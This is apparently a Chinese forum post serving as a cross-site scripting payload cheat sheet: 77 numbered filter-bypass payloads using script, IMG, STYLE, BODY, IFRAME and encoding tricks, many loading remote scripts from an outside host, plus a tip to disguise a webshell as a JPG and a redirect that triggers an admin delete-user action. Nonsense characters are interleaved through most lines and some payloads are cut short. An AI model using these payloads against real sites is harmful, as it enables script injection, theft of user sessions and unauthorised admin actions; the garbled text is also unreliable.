跨站图片shell
! x3 x( L2 N6 n6 jXSS跨站代码 <script>alert("")</script>
/ A: u9 H1 h3 K' m$ M. G8 A1 u
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
# u7 a6 o1 r8 ^' z! q; f' Q
) g8 t- N# ]7 C6 k
$ }4 k; \1 r; {$ M* |; k# z' R. @) s% X
1)普通的XSS JavaScript注入. Q0 H6 F5 l5 N0 i$ k1 z" Y
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>" {( E, G' V5 m9 D/ `4 U9 L
! c$ R/ p4 W8 `5 C$ V(2)IMG标签XSS使用JavaScript命令
( _; E; s1 o u4 |- g7 R<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
( F# `& N$ v; D" U' q5 r0 E/ K5 `5 f$ Y. @
(3)IMG标签无分号无引号- k. h9 {8 Y/ Q/ e( ^0 y8 Y9 o
<IMG SRC=javascript:alert(‘XSS’)>2 G# R$ n/ V& q7 s9 Y8 y& s
' ^# e& k. [4 o
(4)IMG标签大小写不敏感! q% u3 i* r5 y u' D4 E
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
& Q! K W; _2 r+ @+ p% t- F7 V+ c6 [
(5)HTML编码(必须有分号)6 X+ @! q, \2 p" n2 T$ ^& W5 n" S$ H
<IMG SRC=javascript:alert(“XSS”)>' t b8 [6 k( {6 v; |
5 o- `5 d2 `3 f( m- l+ h4 G3 \(6)修正缺陷IMG标签
) ^' m3 i) B3 N7 R, @% ?' c<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>+ E5 _/ R1 ~, Y6 ]* O
, }, V+ \" Q( [$ [7 r1 J(7)formCharCode标签(计算器)
3 R( ^# q3 A7 l- @: F8 o2 G4 m<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>) ` @9 P7 O. |6 s8 Z3 j! K$ f! r9 j
; n7 ^) g; i8 e(8)UTF-8的Unicode编码(计算器)
0 t& r0 D9 i4 ^( [! S5 R<IMG SRC=jav..省略..S')>
2 n: x( X0 e. A- y& O ^$ @! a- i( I' M( C# R3 Q9 m
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
R5 d+ `, G) |/ _! S! e<IMG SRC=jav..省略..S')>
B) @! a5 n) |* h- Q( h7 M7 K( b0 H! \
(10)十六进制编码也是没有分号(计算器)
3 H' B D* d7 l* p$ a<IMG SRC=java..省略..XSS')>
) p3 L! |+ p" ?0 ~+ e: i; Y
6 Y5 A! A) Q" V' c) `* |' R(11)嵌入式标签,将Javascript分开0 a! o5 E- B2 d; `' O
<IMG SRC=”jav ascript:alert(‘XSS’);”>/ |5 S- J3 x4 ?# U! ]8 C2 V7 h. f
5 i0 J- [$ T& J9 @9 p
(12)嵌入式编码标签,将Javascript分开
7 O4 ~, _" p* K( Z; u<IMG SRC=”jav ascript:alert(‘XSS’);”>
" `3 @0 s$ Z5 G' x) m+ S
6 o: k+ M2 p0 W1 Q( b(13)嵌入式换行符
9 h, x: U* Y, l<IMG SRC=”jav ascript:alert(‘XSS’);”>7 A- l8 D* _; {" U
! ~7 I, U) n4 l$ Y(14)嵌入式回车 q' R! f j. J4 C8 j
<IMG SRC=”jav ascript:alert(‘XSS’);”>
6 Y4 q) P4 X& ~2 ~ [1 x# b
S6 g+ M# `' v X2 J(15)嵌入式多行注入JavaScript,这是XSS极端的例子2 A+ P7 c6 i; Q6 m- \
<IMG SRC=”javascript:alert(‘XSS‘)”>& f! O6 g: T- W; U6 p1 v
& H2 C0 T5 c$ f/ S% K4 R. u, Y
(16)解决限制字符(要求同页面)0 w/ t4 Z- b5 X4 A+ o! o+ E
<script>z=’document.’</script>4 V0 V' b& R8 I
<script>z=z+’write(“‘</script>2 [1 R+ _+ G/ c, i
<script>z=z+’<script’</script>7 W0 x+ d& a. p5 \. d7 O5 }
<script>z=z+’ src=ht’</script>
5 c* ~. `% `+ k$ ?9 e0 y; ^. h<script>z=z+’tp://ww’</script>2 ^ d2 I; I- ?* C/ }
<script>z=z+’w.shell’</script>8 J i3 `) M# A9 U! t4 [ X
<script>z=z+’.net/1.’</script>, p: p$ |; f" v# Y
<script>z=z+’js></sc’</script>
2 Q3 }0 z) i) E<script>z=z+’ript>”)’</script>9 q6 N) U( l9 D0 o
<script>eval_r(z)</script>" \5 K; z+ N0 y- ?. p% a! G) w* H
* P% @; {9 z& Z' s3 X1 D
(17)空字符
) s2 `$ H3 X+ c/ i6 p4 Z4 Fperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
' r2 [' ]' } y8 d! [" h+ \
r2 f2 a( w/ i: ~) ~/ z+ Q' Z(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
. O% _! T4 X8 ] r6 b0 z( mperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
- D9 A8 I4 J$ c: k! L2 G1 I5 E) b! x" E
(19)Spaces和meta前的IMG标签
0 F5 S6 J8 v7 }* q/ l7 t2 E* B<IMG SRC=” javascript:alert(‘XSS’);”> R G$ H; A( f, k1 p* D
3 f4 z, Y3 o. ~
(20)Non-alpha-non-digit XSS% A2 O6 f5 `/ U: S, {$ w
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
2 @2 j: Z! K( {& e4 H
- \" K* ?# x/ B* n(21)Non-alpha-non-digit XSS to 29 k, Q8 f6 b2 K! n, |
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
; O! k2 Z0 Y& V( Z4 X: `5 Z: t6 J( D0 p6 |; A
(22)Non-alpha-non-digit XSS to 36 D6 L6 q4 u( s" V
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
' y. u. Z1 J; \* U' [8 w
5 J. [7 D) U9 E( }(23)双开括号1 v7 V+ J/ s7 F( |& ]
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
, y7 L- v: p2 K4 m
1 {+ H0 G. t0 {8 l4 G0 q(24)无结束脚本标记(仅火狐等浏览器)
5 }/ A/ Y7 Y: u2 ~2 N<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
N' v3 i2 {3 H- l* l, Y( G; {5 G: {
(25)无结束脚本标记2, l. j2 c* t: I& t2 u- T, u' X8 i
<SCRIPT SRC=//3w.org/XSS/xss.js>% t2 l0 Q# W0 W% R1 l) ^/ o( ~4 N
6 S$ P( E. c5 G9 v# R(26)半开的HTML/JavaScript XSS! I. D0 a1 \4 j5 t: J+ v& B0 B h; C
<IMG SRC=”javascript:alert(‘XSS’)”: O+ A$ c' M6 ]5 k8 {# \' l1 F
6 Z1 m$ e$ _6 p" H/ ?(27)双开角括号% Q3 t) _! z- k5 P2 j
<iframe src=http://3w.org/XSS.html <
) g7 s) f3 Y3 u u+ _5 l& G& F0 z2 s& `) ]. w% p+ s
(28)无单引号 双引号 分号7 n3 t! s2 \3 D1 [8 {! _' [, u
<SCRIPT>a=/XSS/
, z9 Q% g: ]6 w& Nalert(a.source)</SCRIPT>
# K. Q+ M7 B* F; P- i
7 ]2 g. N7 {6 F: }- Y! ](29)换码过滤的JavaScript
) ?9 r: l8 F% A) a( D; {& |\”;alert(‘XSS’);//
. M3 |- ]" I; V$ @: x; r5 S& J" R" I* l7 g& I& y
(30)结束Title标签
, [; o6 O7 r4 L8 t6 R" `</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>7 T& q* [: b/ k5 }
1 w+ a9 |% d' N
(31)Input Image$ A* \5 Z: n, S6 F8 x2 Z2 ?; x
<INPUT SRC=”javascript:alert(‘XSS’);”>
4 |8 c, m. l6 y/ R
% k( }# z: \ S" @, m+ Q4 I(32)BODY Image7 L, h' I; G/ C7 w8 Y* V
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
% {- p6 {3 R1 {$ I9 Q2 t1 t8 h& d, j. U: e* ^+ P- h; J
(33)BODY标签4 {# p- z; p: m
<BODY(‘XSS’)>
. x: A% A* f( O4 e& o+ I( z9 Q( w, ]. W. i9 b4 j
(34)IMG Dynsrc- E& c3 U, i; }
<IMG DYNSRC=”javascript:alert(‘XSS’)”>( k! O* `9 r9 `0 W
: a9 f0 G' F+ l3 E7 w9 T(35)IMG Lowsrc- f; c1 j: N+ t9 ]' W r2 O
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
% Q$ [* }' M2 }0 R8 ~: f" k
, r3 G* ?8 l% y9 @6 O1 v(36)BGSOUND
2 j3 m1 Q- A& c' j6 L7 z<BGSOUND SRC=”javascript:alert(‘XSS’);”>" q! S! ^% t( _9 q' V6 j
2 Y0 P, Z3 q8 v% `" A(37)STYLE sheet
* h" o$ F" t( `1 X: t0 x' E8 e' g<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>, d( Z% d, c U. M: Q- u5 {
1 T- R2 z. E0 ]" a7 {
(38)远程样式表
2 X3 d3 G: P2 E+ r6 K% m+ x<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
; w1 f' d4 E% G5 _( P7 U7 |
0 L! ^6 R4 @/ z& w0 G4 ^(39)List-style-image(列表式)
+ E% j( d' k1 z e/ c! X<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
! \1 h3 C0 Q8 z' S# U% p
5 v0 z! Z0 }9 X, ]& t2 n! C(40)IMG VBscript5 ~) X e) n I) k1 C
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS. e- y, e, g# c2 z8 H# p9 _- A; [
* B$ U% z3 w' ~8 q3 D2 ~# z+ n2 B
(41)META链接url9 a3 R' r5 ]2 O' P
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
; D& @7 b5 l* M+ s( j# y( v+ l# I) f; d1 Z$ }0 I
(42)Iframe
+ S! Z% l5 P' n% Z6 s ?5 Q9 U/ x<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
& t# x, }" v& l(43)Frame$ o! Q; M. U/ T
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
6 |* f% }8 V; s: p+ [
4 }3 h9 h" k2 ^6 [) g% }" @: A(44)Table% E) U' a$ H X! x; [! p
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>4 q& t. F$ Y0 ^
( ?, P3 }/ i5 H) }$ \
(45)TD4 B( p' I0 ^$ ?8 l$ ?
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
+ R& k: U+ Q: g# g( d) O0 u2 i" `1 [8 ?4 b( |+ Y% c
(46)DIV background-image
7 X) X, }9 K% i& J# `5 [8 T. C<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>; J/ T1 S9 U. v2 `$ Q: J3 I
. {+ ?$ d% {* L8 H3 u(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)6 @) h- N C( [5 N8 V% B0 g
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>9 u8 D$ f+ w4 M C) Z7 _ I: [' \
% r: i$ T& W& V% C+ \7 k6 o
(48)DIV expression" ]$ Z0 B; h, @8 w" ^4 U% H
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
1 w1 H/ l# `9 D3 E/ e( e0 T6 a b* J O+ `2 C j# q. s( f
(49)STYLE属性分拆表达
( Q6 K- |+ Y, v, k: k3 ^/ j5 ~6 x<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>+ P* x5 C' e) D3 K% E' p
1 p- k3 G3 [! s
(50)匿名STYLE(组成:开角号和一个字母开头)
( L0 x+ |, v4 |1 k+ D" C' }<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
/ u0 E1 ]/ M; f0 [$ X$ o0 i; R+ `( m# x2 h
(51)STYLE background-image+ x3 `3 }6 Q- {5 u/ H& y
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>7 m: V! \" ~& M
8 q) P" h- z7 L/ r$ y( F
(52)IMG STYLE方式 D n( Q7 A1 t( b6 C" r* l( v( r8 [# p
exppression(alert(“XSS”))’>
3 V2 E& L% W1 a5 N8 c9 u" a( I
. {0 ~5 @. F; t) D- s(53)STYLE background
4 }7 m0 a1 S! S7 ` }5 e9 v<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>5 q& }3 }- r6 B
9 o+ [' s0 f. |- [1 O0 R2 R(54)BASE; N7 \$ `+ f K. ~2 e
<BASE HREF=”javascript:alert(‘XSS’);//”>* W- o- O8 C5 n( A5 P
_# f8 Z* s# j1 @
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
% z3 Z8 o- ?& p3 n c<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
W$ I6 C% Z6 c) L" z/ i2 Y# [0 `/ m6 R6 }5 r
(56)在flash中使用ActionScrpt可以混进你XSS的代码" J4 O. W. F: \( F
a=”get”;
4 a3 \6 J. i4 c$ x5 hb=”URL(\”";) g- n1 B8 ]) t% H
c=”javascript:”;
% {& H& H$ v6 e( n3 R2 I) ]- m) od=”alert(‘XSS’);\”)”;! C& `+ \. d" a" Y" Q2 A7 [! f
eval_r(a+b+c+d);
" G6 q0 c0 o7 l) y
4 R+ ?, b5 H/ l' I! M4 }(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
5 p; @+ Q2 T; u7 ~( R2 A ]<HTML xmlns:xss>7 D5 p9 j, R. W& q" X; n6 K) B- U
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>' k. h8 C/ X: k4 z
<xss:xss>XSS</xss:xss>, @; }8 K* j& L! j( F" O% u
</HTML>' s' a8 v4 g) i3 d/ @; L
: o1 c9 r: }: H6 C2 [
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用8 ^2 B3 H' \; K' Q1 Z; |9 o) m
<SCRIPT SRC=””></SCRIPT>
; A3 v8 |$ E# G' B) v6 h; a1 w" `4 l9 y' W6 x" L/ o
(59)IMG嵌入式命令,可执行任意命令( F5 u- u3 h- S7 z6 n( Q+ g
<IMG SRC=”http://www.XXX.com/a.php?a=b”>4 n, F- \6 u4 k, h8 Q: Q! z9 S
8 Q% f0 \% ~: m( a) k8 A4 g1 y
(60)IMG嵌入式命令(a.jpg在同服务器)8 D1 L" l9 j3 J+ U+ b: J" W/ T
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser$ ^+ Q7 }* f$ O; n1 [* ^! R7 b
7 q3 d. D9 w: p* ^(61)绕符号过滤( k3 j& u+ a& i2 {4 c
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>6 W4 L8 P5 E7 L$ n+ n$ R' k/ T3 K
\ V( M2 i& a, v# `- ?$ x3 k) n(62)
2 o/ j% M- r* i i: U- q0 w<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>/ a) S7 ^* h5 F- _7 o" L" \8 n
1 R" g- A( }: O- ?3 {9 M2 }+ x R% H
(63)
5 K+ V3 I# Z8 H8 W- N& d$ ~<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>- K2 Q3 T2 H8 z# J# z( U' A
; x: C3 V% J/ ?/ _" F5 @+ R5 q(64)( D, }1 J& N7 l& u' t4 c7 J
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
8 j4 m2 S, f+ K$ f
( Z; b8 |! M8 z0 ^: X9 v6 Y; r(65)& S$ q1 _# j/ T3 g) O' C# O
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>- ^- y$ |* E5 [- Q
; e5 ^+ f2 D/ S8 H0 v$ j
(66)6 I6 M5 k2 n1 q
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>. I0 T+ U1 l$ N& f3 U
! r4 e( ~9 E0 i4 y(67)6 ?9 D+ X: A% S4 G ?
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>& A6 B! s- C; G( R* [* }8 g
- T4 m4 V) b0 X# ~8 c* k& o: D/ A$ @
(68)URL绕行- @4 M* y# g/ p" Z9 z
<A HREF=”http://127.0.0.1/”>XSS</A>/ P& q2 j8 ^0 U. y% I4 W- u
$ s5 f, S d7 w& Y, @, d
(69)URL编码" I) a" g+ B r9 F# ?
<A HREF=”http://3w.org”>XSS</A>
6 b3 h- X4 K! ?, g
! \) N/ i' W# S( N(70)IP十进制' h; u ? _, t# S
<A HREF=”http://3232235521″>XSS</A>
" h. I1 L6 [: [* K+ j+ w( q5 b8 _3 X+ S7 R3 W# l
(71)IP十六进制( C9 z$ C8 j. i2 V# p( G! b& b
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>7 N/ x( g; [/ r# I7 c
. ]/ i- c x) X0 n
(72)IP八进制
, l* V1 q+ n" n! M2 N<A HREF=”http://0300.0250.0000.0001″>XSS</A>
4 `' h6 u* c9 P% B5 H5 F2 ]; e: m; f6 ~+ [' S9 J
(73)混合编码5 o5 j5 d- K: V. R" `: |& O
<A HREF=”h0 N j+ N* ?, H" Y4 Y( A
tt p://6 6.000146.0×7.147/”">XSS</A>* B5 W0 a9 L. ~
- B' c/ f4 \$ r5 ?0 u4 u(74)节省[http:]% P# i" h4 R& j7 V
<A HREF=”//www.google.com/”>XSS</A>6 D) A1 ]% x$ t. i( C
& u) D2 s" L# l/ y
(75)节省[www]
" o2 @$ H0 j0 p<A HREF=”http://google.com/”>XSS</A> ?$ S! z2 H" h; R& ^ k' H( n
& S. b9 g- U* h, r. S! v(76)绝对点绝对DNS
0 P( m) @4 p* U! u/ A! O& F. x<A HREF=”http://www.google.com./”>XSS</A>' g% k# N: J0 J+ [) ?2 |7 X
) t3 d, R" J" D! `5 L& Q1 i7 g1 [2 H(77)javascript链接
& G5 E5 F; Y9 ]<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>4 n2 I6 `( z4 S+ a& A% V% s2 A
|